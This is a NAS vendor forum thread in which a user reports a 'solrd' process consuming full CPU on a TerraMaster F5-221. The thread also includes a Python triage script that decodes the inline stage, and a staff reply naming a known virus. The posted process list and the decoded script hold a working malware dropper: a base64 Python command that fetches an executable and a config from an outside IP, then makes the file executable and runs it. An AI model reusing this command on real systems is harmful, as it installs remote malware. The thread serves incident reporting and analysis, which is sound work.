SOLRD Process using 100% CPU - F5-221 - TOS 4.2.13

CPU, memory, fan, process, services status, system log, temperature
fec
Posts: 5
Joined: 31 May 2021, 23:24

SOLRD Process using 100% CPU - F5-221 - TOS 4.2.13

Post by fec »

Hello all,

I saw that this process "solrd" is taking all the CPU resources from my F5-221 NAS. I post it here so everyone can see it.


root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
root 13229 13144 99 Aug06 ? 147-14:52:16 ./solrd

The decoded payload is this Python script:
"""
f=open("./solrd","wb")
f.write(__import__("urllib2").urlopen("http://45.144.3.216:10000/starrail/cbt2zip/setup.exe").read())
f.close()
f=open("./config.json","wb")
f.write(__import__("urllib2").urlopen("http://45.144.3.216:10000/TNAS.json").read())
f.close()
"""

So I guess someone got access to my NAS using the TOS web access and modified that configuration.
This is a serious security issue.
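The triage the poster did by hand (spot the inline base64 stage in the process list, decode it, see what it fetches and writes) can be scripted. The following is an added example, not code from the poster or from TerraMaster: it parses `ps -ef` style lines, decodes every blob handed to `b64decode(...)`, and reports the parent process, the URLs the stage contacts, the files it writes and its child processes. The sample listing is the one from this thread.

```python
import base64
import re

# Sample `ps -ef` lines copied from the posts in this thread (the base64 blob is
# the one the poster decoded; it is taken from the page, not constructed here).
PS_LISTING = """\
root 4252 4249 0 2021 ? 00:02:42 php-fpm: pool TOS
root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
root 13229 13144 99 Aug06 ? 147-14:52:16 ./solrd
"""

# A base64 string handed straight to b64decode() inside a command line.
B64_EXEC_RE = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
# open("<path>", "w..."): files the decoded stage writes to disk.
WRITE_RE = re.compile(r"open\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]w")


def parse_ps(listing):
    """Map pid -> {uid, ppid, cmd} from `ps -ef` style output (8 columns)."""
    procs = {}
    for line in listing.splitlines():
        parts = line.split(None, 7)
        if len(parts) == 8:
            uid, pid, ppid, _c, _stime, _tty, _time, cmd = parts
            procs[pid] = {"uid": uid, "ppid": ppid, "cmd": cmd}
    return procs


def decode_inline_stages(cmd):
    """Decode every base64 blob passed to b64decode() in a command line."""
    return [base64.b64decode(b).decode("utf-8", "replace")
            for b in B64_EXEC_RE.findall(cmd)]


def triage(listing):
    """Flag processes that exec an inline base64 stage and summarise what it does."""
    procs = parse_ps(listing)
    hits = []
    for pid, p in procs.items():
        stages = decode_inline_stages(p["cmd"])
        if not stages:
            continue
        script = "\n".join(stages)
        hits.append({
            "pid": pid,
            "uid": p["uid"],
            # A web-server worker as parent points at the web interface as the entry point.
            "parent_cmd": procs.get(p["ppid"], {}).get("cmd", "?"),
            "urls": URL_RE.findall(script),
            "files_written": WRITE_RE.findall(script),
            "children": [c for c, q in procs.items() if q["ppid"] == pid],
        })
    return hits
```

Run `triage(PS_LISTING)` on the listing above and the only hit is PID 13144, with `php-fpm: pool TOS` as its parent, the two download URLs, `./solrd` and `./config.json` as written files, and PID 13229 (the `./solrd` process eating the CPU) as its child.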
fec
Posts: 5
Joined: 31 May 2021, 23:24

Re: SOLRD Process using 100% CPU - F5-221 - TOS 4.2.13

Post by fec »

root 4252 4249 0 2021 ? 00:02:42 php-fpm: pool TOS
root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
fec
Posts: 5
Joined: 31 May 2021, 23:24

Re: SOLRD Process using 100% CPU - F5-221 - TOS 4.2.13

Post by fec »

Solrd_100_CPU.PNG
TMtina
TerraMaster Team
Posts: 100
Joined: 01 Nov 2022, 18:00

Re: SOLRD Process using 100% CPU - F5-221 - TOS 4.2.13

Post by TMtina »

This seems to be the dig virus; please refer to this link: viewtopic.php?f=71&t=2292&p=12383&hilit=pty10#p12383.